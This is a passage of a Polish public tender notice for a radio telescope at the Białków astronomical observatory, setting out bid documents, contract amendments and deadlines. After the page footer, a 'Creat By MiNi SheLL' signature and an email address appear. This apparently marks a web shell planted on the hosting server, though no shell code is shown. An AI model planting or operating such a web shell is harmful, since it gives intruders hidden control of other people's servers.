na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych<br/>zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności<br/>zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia<br/>gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>4. Wykonawca może w celu potwierdzenia spełniania warunków, o których mowa w pkt 1<br/>powyżej, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego<br/>części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nim stosunków prawnych.<br/>4.1.W takim przypadku podmiot udostępniający zasoby musi w odniesieniu do warunku<br/>określonego w pkt 1 powyżej spełnić go samodzielnie.<br/>4.2.Zamawiający ocenia, czy udostępniane wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na<br/>wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w<br/>pkt 1 powyżej, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia,<br/>które zostały przewidziane względem Wykonawcy;<br/>4.3.Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu<br/>udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda,<br/>aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym<br/>podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w<br/>postępowaniu.<br/>4.4.Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub<br/>sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w<br/>danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca składa wraz z ofertą oświadczenie, o którym mowa wart. 125<br/>ust. 1 uPzp o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, w zakresie<br/>wskazanym przez Zamawiającego – wzór stanowi Załącznik nr 2 do SWZ. Oświadczenie to, stanowi<br/>dowód potwierdzający brak podstaw do wykluczenia, spełnienie warunków udziału w postępowaniu,<br/>odpowiednio na dzień składania ofert, zastępujący wymagane przez Zamawiającego podmiotowe<br/>środki dowodowe.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca składa wraz z ofertą oświadczenie, o którym mowa wart. 125<br/>ust. 1 uPzp o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, w zakresie<br/>wskazanym przez Zamawiającego – wzór stanowi Załącznik nr 2 do SWZ. Oświadczenie to, stanowi<br/>dowód potwierdzający brak podstaw do wykluczenia, spełnienie warunków udziału w postępowaniu,<br/>odpowiednio na dzień składania ofert, zastępujący wymagane przez Zamawiającego podmiotowe<br/>środki dowodowe.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawca zobowiązany jest do złożenia wraz z ofertą szczegółowego i jednoznacznego opisu<br/>przedmiotu zamówienia (załącznik nr 4 do SWZ) jako przedmiotowego środka dowodowego -<br/>Wykonawca zobowiązany jest do złożenia Oferty, której treść pozwoli Zamawiającemu na<br/>zweryfikowanie Oferty pod względem jej zgodności z treścią SWZ. Treść Oferty Wykonawcy<br/>musi odpowiadać treści specyfikacji warunków zamówienia. Tym samym Wykonawca<br/>zobowiązany jest do jednoznacznego określenia w Załączniku nr 4 do SWZ - Opis przedmiotu<br/>zamówienia zaoferowanych odpowiednio produktów, charakteryzując je poprzez odpowiednie<br/>wskazanie (wg postawionego przez Zamawiającego szczegółowego wymogu) producenta,<br/>model, typ oferowanego radioteleskopu spełniającego wymagania Zamawiającego oraz<br/>wykazać, że oferowany radioteleskop spełnia wymagania określone przez Zamawiającego<br/>poprzez dokładne opisanie lub potwierdzenie parametrów lub funkcjonalności oferowanego<br/>sprzętu – zgodnie z wymaganiami.<br/>Zamawiający zaakceptuje inne równoważne przedmiotowe środki dowodowe, jeśli potwierdzą,<br/>że oferowane dostawy spełniają określone przez Zamawiającego wymagania, cechy i kryteria.<br/>Podpisany dokument należy złożyć wraz z ofertą.<br/>Zamawiający nie będzie wzywał do złożenia przedmiotowych środków dowodowych.<br/>Wykonawca składa je wraz z ofertą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> OFERTA SKŁADA SIĘ Z:<br/>1. Formularza oferty sporządzonego według wzoru stanowiącego Załącznik nr 1 do SWZ;<br/>2. Oświadczenia, o którym mowa w art.125 ust. 1 uPzp - Załącznik nr 2 do SWZ<br/>tj. do oferty każdy Wykonawca dołącza oświadczenie, o którym mowa wart. 125 ust. 1 uPzp o<br/>niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, w zakresie<br/>wskazanym przez Zamawiającego – wzór stanowi Załącznik nr 2 do SWZ. Oświadczenie to,<br/>stanowi dowód potwierdzający brak podstaw do wykluczenia, spełnienie warunków udziału w<br/>postępowaniu, odpowiednio na dzień składania ofert, zastępujący wymagane przez<br/>Zamawiającego podmiotowe środki dowodowe.<br/>2.1. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o<br/>którym mowa powyżej, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie,<br/>w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>2.2. (jeżeli dotyczy) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa<br/>powyżej , także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału<br/>w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>3. Wypełniony i podpisany Opis przedmiotu zamówienia – Załącznik nr 4 do SWZ<br/>4. Dokumentów, z których wynika prawo do podpisywania oferty, w tym pełnomocnictwa lub<br/>innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy dla<br/>osoby/osób podpisującej/cych ofertę zgodnie z rozdziałem XI pkt 7 SWZ.<br/>5. (jeżeli dotyczy) zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek<br/>dowodowy, o którym mowa w rozdziale VII pkt pkt 2 SWZ – Załącznik nr 3 do SWZ tj.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,składa zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu udostępniającego zasoby<br/>potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje<br/>rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolności którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>6. (jeżeli dotyczy) W przypadku gdy oferta zawiera informacje stanowiące tajemnicę<br/>przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu<br/>nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), Wykonawca, w celu utrzymania w<br/>poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku –<br/>szczegóły opisane w pkt 6 rozdziału XI SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia. Wykonawcy<br/>występujący wspólnie np. spółki cywilne, konsorcja, zgodnie z art. 58 ust. 2 uPzp zobowiązani są<br/>ustanowić pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie<br/>zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego.<br/>Dokument ten winien być opatrzony przez osobę/osoby uprawnioną(-e) do jego udzielenia tj.<br/>zgodnie z formą reprezentacji każdego z Wykonawców kwalifikowanym podpisem<br/>elektronicznym lub podpisem zaufanym lub podpisem osobistym. Punkt 7.1 powyżej stosuje się.<br/>Wszelka korespondencja oraz rozliczenia prowadzone będą wyłącznie z podmiotem<br/>występującym jako Pełnomocnik.<br/>Wykaz dokumentów składanych wraz z ofertą, w przypadku Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, został określony w rozdziale VII pkt 1 SWZ.<br/>(odpowiednio rozdział V.5.11 pkt I ppkt 2.1 ogłoszenia) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający przewiduje udzielenie zaliczki w wysokości maksymalnie 50% wartości<br/>wynagrodzenia Wykonawcy. Szczegóły dotyczące zaliczki opisane są w § 9 wzoru umowy. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Jako odrębny Załącznik nr 5 do SWZ Zamawiający zamieścił Wzór umowy, który określa<br/>warunki realizacji przedmiotowego zamówienia publicznego.<br/>2. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 455 uPzp oraz wskazanym we wzorze umowy tj.<br/>1) nie później niż 100 dni od dnia zawarcia Umowy Zamawiający uzna, że stan terenu<br/>przeznaczonego na montaż RTP nie pozwala na jego bezpieczny montaż. W takim wypadku<br/>możliwe będzie przesunięcie terminu realizacji Przedmiotu Umowy o okres potrzebny do<br/>zakończenia koniecznych do wykonania robót budowlanych, lecz nie później niż do 300 dni od<br/>dnia zawarcia Umowy.<br/>2) wpłynie umotywowany wniosek Wykonawcy związany z brakiem możliwości realizowania<br/>Przedmiotu Umowy. Niemożność realizacji Przedmiotu Umowy spowodowana musi być<br/>okolicznościami, na które Wykonawca nie miał wpływu, w szczególności, gdy są one<br/>następstwem siły wyższej. Pod pojęciem siły wyższej Strony rozumieją takie nadzwyczajne<br/>okoliczności, jak m.in. klęski żywiołowe, stan wyjątkowy, stan epidemii, stan wojenny, nowe akty<br/>prawne lub decyzje administracyjne mające wpływ na realizację Przedmiotu Umowy. W takim<br/>wypadku dopuszcza się wydłużenie terminu wykonania określonego w § 4 ust. 1 Umowy o<br/>okres, w którym Wykonawca nie mógł realizować Przedmiotu Umowy i nie ponosi z tego tytułu<br/>winy.<br/>3) wprowadzenia zmian w parametrach technicznych, technologicznych lub oprogramowaniu<br/>Przedmiotu Umowy – przy czym zmiany te nie mogą dotyczyć przedłużenia terminów realizacji<br/>Umowy, ani zwiększenia Wynagrodzenia – w przypadku, gdy wystąpi:<br/>– konieczności wprowadzenia rozwiązań alternatywnych, jeśli okażą się niezbędne do<br/>prawidłowego uruchomienia i działania urządzenia,<br/>- pojawienie się na rynku urządzeń lub programów nowszej generacji pozwalających na<br/>zaoszczędzenie kosztów realizacji Przedmiotu Umowy lub późniejszych kosztów eksploatacji po<br/>stronie Zamawiającego,<br/>- konieczność zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań ze<br/>względu na zmiany obowiązującego prawa.<br/>3. Zmiana nazwy, siedziby stron Umowy, osób reprezentujących Wykonawcę i Zamawiające-go<br/>numerów rachunków bankowych wymaga poinformowania drugiej strony na piśmie i nie stanowi<br/>zmiany umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniPortal.uzp.gov.pl, formularz wypełnia się na stronie:https://obywatel.gov.pl/nforms/ezamowienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-29 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Postępowanie prowadzone jest pisemnie w języku polskim i angielskim.<br/>W przypadku rozbieżności pomiędzy wersjami językowymi rozstrzygająca jest wersja w języku<br/>polskim, zapis dotyczy również postanowień umowy i pozostałych załączników do SWZ.<br/>Zamawiający dopuszcza złożenie oferty wraz z wymaganymi dokumentami również w języku angielskim.<br/>2. Termin wykonania zamówienia: do 170 dni od daty zawarcia umowy<br/>3. Wszelkie rozliczenia związane z realizacją zamówienia publicznego, którego dotyczy niniejsza<br/>SWZ dokonywane będą w EURO albo USD albo GBP, zgodnie z wybraną przez Wykonawcę<br/>walutą w Formularzu ofertowym.<br/>4. Przedmiot zamówienia realizowany jest w ramach projektu „Rewitalizacja Zespołu<br/>pałacowego i Obserwatorium astronomicznego w Białkowie wraz z zagospodarowaniem terenu<br/>na Centrum Edukacji Astronomicznej” na podstawie Umowy nr RPDS.06.03.01-02-0048/17-00,<br/>który otrzymał dofinansowanie w ramach:<br/>• Osi Priorytetowej nr 6 „Infrastruktura spójności społecznej”,<br/>• Działania nr 6.3 „Rewitalizacja zdegradowanych obszarów”,<br/>• Poddziałania nr 6.3.1 „Rewitalizacja zdegradowanych obszarów– konkursy horyzontalne”,<br/>Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2014-2020.<br/>oraz współfinansowany ze środków w ramach umowy o współpracy z firmą ITTI Sp. z o.o. na<br/>realizację projektu „PL_RM22 European F10.7 and F30 index monitoring system (EFFIMS)",<br/>zgodnie z umową z Europejską Agencją Kosmiczną (ESA) nr 4000131342/20/D/CT.<br/>5. Specyfikacja Warunków Zamówienia (SWZ) w języku polskim i angielskim wraz z załącznikami znajduje<br/>się na stronie internetowej prowadzonego postępowania:<br/>https://bip.uni.wroc.pl/374/280/dostawy-ponizej-214-000-euro.html.<br/>The procedure shall be conducted in writing in Polish and English. In the case of any<br/>discrepancies between the language versions, the Polish language version shall prevail. It also<br/>applies to the provisions of the contract and other annexes to the SOT.<br/>The Orderer shall also accept submitting a tender, together with the required documents, in<br/>Polish or English.<br/>SPECIFICATION OF ORDER TERMS (the SOT) with attachments in English is available on the<br/>website of the ongoing procedure: https://bip.uni.wroc.pl/374/280/dostawy-ponizej-214-000-<br/>euro.html.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-18 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com